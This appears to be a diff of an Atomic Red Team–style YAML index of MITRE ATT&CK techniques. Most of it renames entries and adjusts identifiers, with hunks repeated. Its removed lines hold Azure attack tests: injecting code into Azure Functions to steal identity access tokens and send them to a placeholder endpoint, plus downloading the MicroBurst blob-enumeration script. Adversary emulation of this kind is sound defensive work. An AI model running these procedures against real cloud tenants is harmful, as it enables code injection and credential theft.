    technique:
@@ -14275,7 +14276,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14352,7 +14353,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44851,7 +44851,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44928,7 +44928,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -49104,7 +49103,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -49140,6 +49139,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -1046,7 +1046,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1095,6 +1095,7 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
+      identifier: T1027.013
    atomic_tests: []
  T1014:
    technique:
@@ -14204,7 +14205,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14281,7 +14282,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44252,7 +44252,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44329,7 +44329,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -48505,7 +48504,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -48541,6 +48540,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -1046,7 +1046,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1095,6 +1095,7 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
+      identifier: T1027.013
    atomic_tests: []
  T1014:
    technique:
@@ -14204,7 +14205,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14281,7 +14282,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44426,7 +44426,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44503,7 +44503,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -48679,7 +48678,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -48715,6 +48714,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -1046,7 +1046,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1095,6 +1095,7 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
+      identifier: T1027.013
    atomic_tests: []
  T1014:
    technique:
@@ -14204,7 +14205,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14281,7 +14282,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44252,7 +44252,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44329,7 +44329,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -48505,7 +48504,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -48541,6 +48540,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -1046,7 +1046,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1095,6 +1095,7 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
+      identifier: T1027.013
    atomic_tests: []
  T1014:
    technique:
@@ -12170,9 +12171,9 @@ defense-evasion:
        command: |
          aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
          echo "*** Log Group Created ***"
-          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
          echo "*** Log Stream Created ***"
-          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
          echo "*** Log Stream Deleted ***"
          aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
          echo "*** Log Group Deleted ***"
@@ -14629,7 +14630,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14706,7 +14707,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -45015,7 +45015,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -45092,7 +45092,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -49368,7 +49367,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -49404,6 +49403,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -1046,7 +1046,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1095,6 +1095,7 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
+      identifier: T1027.013
    atomic_tests: []
  T1014:
    technique:
@@ -14340,7 +14341,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14417,223 +14418,7 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
-    atomic_tests:
-    - name: Azure - Functions code upload - Functions code injection via Blob upload
-      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
-      description: "This test injects code into an Azure Function (RCE).\n\nAttack
-        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
-        to T1550.001 \"Azure - Functions code upload - Functions code injection to
-        retrieve the Functions identity access token\", the depicted code injection
-        scenario tampers the source code of Azure Functions to perform Subscription
-        Privilege Escalation by retrieving the identity access token of an Azure functions
-        instance. In this case, the prepared zip file (underlying package for a Function)
-        is expected to contain the tampered function presented in src/code_to_insert.py.
-        Note that the endpoint https://changeme.net needs to be adapted in your packed
-        function code.\n\nNote:\n- The Azure Function modified in this test must be
-        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
-        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
-        \n- For Function code upload to Azure Functions that are hosted via Azure
-        Files in a File Share, refer to T1550.001 \"Azure - Functions code upload
-        - Functions code injection to retrieve the Functions identity access token\".\n-
-        The required input fields can be retrieved in a reconnaissance step in test
-        T1619 \"Azure - Enumerate Storage Account Objects via Key-based authentication
-        using Azure CLI\". The code of function apps may be inspected and prepared
-        from the result of test T1530 \"Azure - Dump Azure Storage Account Objects
-        via Azure CLI\".\n\nRequirements:\n- The test is intended to be executed in
-        interactive mode (with -Interactive parameter) in order to complete the az
-        login command when MFA is required.\n- The EntraID user must have the role
-        \"Storage Account Contributor\", or a role with similar permissions."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        container_name:
-          type: string
-          default: container_name_example
-          description: Name of the container that contains the function blob
-        blob_name:
-          type: string
-          default: blob_example
-          description: Name of the function blob
-        file_path_blob:
-          type: path
-          default: "$env:temp/T1550.001_function_code.zip"
-          description: Path to the function code file to upload as blob
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {    \n    $connectionString = az storage account
-          show-connection-string --name \"#{storage_account_name}\" --query connectionString
-          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + \"#{blob_name}\")\n
-          \   az storage blob download --connection-string $connectionString --container-name
-          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
-          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
-          blob version if download of existing blob succeeded\n        az storage
-          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
-          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}\n"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original blob file if upload succeeded
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
-    - name: Azure - Functions code upload - Functions code injection via File Share
-        modification to retrieve the Functions identity access token
-      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
-      description: "This test injects code into an Azure Function (RCE) to perform
-        Subscription Privilege Escalation by retrieving the identity access token
-        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
-        executed, the \"https://changeme\" will retrieve the access token when the
-        function app is executed on behalf of the tenant. The function may be triggered
-        manually from authorized people, triggered in regular intervals, or in various
-        other ways. The access token can then be used to perform further attack steps
-        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
-        \n- The Azure Function modified in this test must be hosted via Azure Files
-        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
-        For Function code upload to Azure Functions that are hosted via Azure Blob
-        storage, refer to T1550.001 \"Azure - Functions code upload - Functions code
-        injection via Blob upload\".\n- The required input fields can be retrieved
-        in a reconnaissance step in test T1619 \"Azure - Enumerate Storage Account
-        Objects via Key-based authentication using Azure CLI\". The code of function
-        apps may be inspected and prepared from the result of test T1530 \"Azure -
-        Dump Azure Storage Account Objects via Azure CLI\".\n- Important: Change the
-        https://changeme.net in code_to_insert_path to a self-controlled endpoint.
-        This endpoint can be hosted e.g. as request bin via Pipedream to display the
-        body of incoming POST requests.\n- The default injected code to retrieve the
-        access token can be replaced by arbitrary other code. In this case: Replace
-        the code defined in code_to_insert_path\n\nRequirements:\n- The test is intended
-        to be executed in interactive mode (with -Interactive parameter) in order
-        to complete the az login command when MFA is required.\n- The EntraID user
-        must have the role \"Storage Account Contributor\", or a role with similar
-        permissions.\n\nExecution options: Defined by the input field execution_option\n-
-        insert_code: This option (1) downloads the existing funciton code into a tmp
-        file, (2) injects the code from code_to_insert_path at the beginning of the
-        file, and (3) uploads the tampered file to the targeted Azure Function code
-        (Azure File Share File).\n- replace_file: This option uploads the function
-        code defined in code_to_insert_path to the targeted Azure Function code (Azure
-        File Share File)."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        execution_option:
-          type: string
-          default: insert_code
-          description: Chooses execution option insert_code, or replace_file
-        file_share_name:
-          type: string
-          default: file_share_name_example
-          description: Name of the file share that is related to the Function
-        file_path:
-          type: path
-          default: site/wwwroot/function_app.py
-          description: Path to the Function file in the file share
-        code_to_insert_path:
-          type: path
-          default: "$PathToAtomicsFolder/T1550.001/src/code_to_insert.py"
-          description: The code that will be injected into the Function
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
-          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + $tmpOriginalFileName)\n
-          \   az storage file download --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
-          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
-          Upload new funciton code if download of existing code succeeded\n        if
-          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
-          file from file share for injection\n            $tmpFunctionCode = Join-Path
-          $env:temp/ (\"T1550.001_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
-          storage file download --account-name \"#{storage_account_name}\" --share-name
-          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
-          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code download failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
-          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
-          -Raw  # Load the content of the insert file\n            \n            $content
-          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
-          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
-          \           $content | Set-Content -Path $tmpFunctionCode       # Write
-          the modified content to the file\n            \n            # Upload file
-          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
-          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code upload failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
-          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
-          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
-          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
-          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
-          code upload failed.\"\n                exit 1\n            }\n            Write-Output
-          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
-          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original f file if upload succeeded
-              if ("#{execution_option}" -eq "insert_code") {
-                  $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
-                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
-              }
-
-              # Delete tmp original file
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
+    atomic_tests: []
  T1078.004:
    technique:
      type: attack-pattern
@@ -41839,99 +41624,6 @@ collection:
      - 'Cloud Storage: Cloud Storage Access'
      identifier: T1530
    atomic_tests:
-    - name: Azure - Enumerate Azure Blobs with MicroBurst
-      auto_generated_guid: 3dab4bcc-667f-4459-aea7-4162dd2d6590
-      description: "Upon successful execution, this test will utilize a wordlist to
-        enumerate the public facing containers and blobs of a specified Azure storage
-        account. \nSee https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/
-        . \n"
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        base:
-          description: Azure blob keyword to enumerate (Example, storage account name)
-          type: string
-          default: secure
-        output_file:
-          description: File to output results to
-          type: string
-          default: "$env:temp\\T1530Test1.txt"
-        wordlist:
-          description: File path to keywords for search permutations
-          type: string
-          default: PathToAtomicsFolder\..\ExternalPayloads\permutations.txt
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
-
-          '
-        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit
-          0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
-      - description: 'The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
-
-          '
-        prereq_command: 'if (test-path "#{wordlist}"){exit 0} else {exit 1}
-
-          '
-        get_prereq_command: 'invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt"
-          -outfile "#{wordlist}"
-
-          '
-      executor:
-        command: |
-          import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
-          Invoke-EnumerateAzureBlobs -base #{base} -permutations "#{wordlist}" -outputfile "#{output_file}"
-        cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
-
-          '
-        name: powershell
-    - name: Azure - Scan for Anonymous Access to Azure Storage (Powershell)
-      auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0
-      description: "Upon successful execution, this test will test for anonymous access
-        to Azure storage containers by invoking a web request and outputting the results
-        to a file. \nThe corresponding response could then be interpreted to determine
-        whether or not the resource/container exists, as well as other information.
-        \nSee https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
-        \    \n"
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        base_name:
-          description: Azure storage account name to test
-          type: string
-          default: T1530Test2
-        output_file:
-          description: File to output results to
-          type: string
-          default: "$env:temp\\T1530Test2.txt"
-        container_name:
-          description: Container name to search for (optional)
-          type: string
-          default:
-        blob_name:
-          description: Blob name to search for (optional)
-          type: string
-          default:
-      executor:
-        command: |
-          try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
-          catch [system.net.webexception]
-          {if($_.Exception.Response -ne $null)
-          {$Response = $_.Exception.Response.GetResponseStream()
-          $ReadResponse = New-Object System.IO.StreamReader($Response)
-          $ReadResponse.BaseStream.Position = 0
-          $responseBody = $ReadResponse.ReadToEnd()}
-          else {$responseBody = "The storage account could not be anonymously accessed."}}
-          "Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
-        cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
-
-          '
-        name: powershell
    - name: Azure - Dump Azure Storage Account Objects via Azure CLI
      auto_generated_guid: 67374845-b4c8-4204-adcc-9b217b65d4f1
      description: |-
@@ -45340,7 +45032,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -45417,223 +45109,7 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
-    atomic_tests:
-    - name: Azure - Functions code upload - Functions code injection via Blob upload
-      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
-      description: "This test injects code into an Azure Function (RCE).\n\nAttack
-        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
